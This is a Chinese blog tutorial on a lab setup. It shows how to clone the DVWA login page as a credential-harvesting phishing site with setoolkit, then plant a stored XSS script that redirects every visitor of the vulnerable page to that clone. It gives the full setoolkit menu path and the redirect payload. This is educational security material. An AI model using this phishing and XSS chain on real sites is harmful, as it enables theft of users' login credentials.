XSS漏洞-XSS攻击实例(十)

2022年8月15日17:13:33 发表评论 289 views

1.1 持久性XSS窃取用户信息

1.1.1 制作钓鱼网站

使用setoolkit克隆站点,setoolkit是一个万能的社工工具(社会工程学工具集合)

# setoolkit
Do you agree to the terms of service [y/n]: y   # 同意服务条款

1.1.1.1 选择1社会工程攻击

Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

  • 菜单解释:

1) 社会工程攻击

2) 渗透测试(快速通道)

3) 第三方模块

4) 更新Social-Engineer Toolkit

5) 更新SET配置

6) 帮助,积分和关于

99) 退出Social-Engineer Toolkit

1.1.1.2 选择2网站攻击载体

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set> 2

  • 菜单解释:

1) 鱼叉式网络钓鱼攻击载体

2) 网站攻击向量

3) 传染性媒体生成器

4) 创建有效负载和侦听器

5) 大规模邮件攻击

6) 基于Arduino的攻击向量

7) 无线接入点攻击向量

8) QRcode生成器攻击向量

9) PowerShell 攻击向量

10) 第三方模块

99) 返回主菜单。

1.1.1.3 选择3凭证收割机攻击方法

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu

set:webattack>3

  • 菜单解释:

1) Java Applet攻击方法

2) Metasploit浏览器攻击方法

3) 凭证收集器攻击方法

4) Tabnabbing攻击方法

5) Web Jacking攻击方法

6)多攻击Web方法

7) HTA攻击方法

99) 返回主菜单。

1.1.1.4 选择2站点克隆

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2

  • 菜单解释:

1) web模板

2) 站点克隆

3) 自定义导入

99) 返回主菜单。

1.1.1.5 设置侦听IP地址保持默认回车即可

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.10.180]:

1.1.1.6 输入URL进行克隆

set:webattack> Enter the url to clone:http://192.168.10.159/DVWA/login.php
# 因为我们前面小节启动了apache 所以80端口是占用的状态,所以我们可以在这里输入y关闭apache
Do you want to attempt to disable Apache  [y/n]: y

1.1.1.7 查看克隆后网站

从外观上来看和真实的站点并没有什么不同:

XSS漏洞-XSS攻击实例(十)

我们可以看到页面又重新跳转回了DVWA站点,也就是真实站点中。

XSS漏洞-XSS攻击实例(十)

我们回到setoolkit查看,已经记录下了在我们克隆站点输入的用户名密码信息。

XSS漏洞-XSS攻击实例(十)

1.1.2 进行存储型XSS页面跳转

1.1.2.1 修改源码增加输入长度

XSS漏洞-XSS攻击实例(十)

1.1.2.2 构造攻击脚本

<script>window.location="http://192.168.10.180/"</script>

1.1.2.3 执行攻击

XSS漏洞-XSS攻击实例(十)

点击提交之后会自动跳转到克隆站点,每次访问该页面都会跳转到克隆站点,只要在克隆站点登录账户信息就会被记录。

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang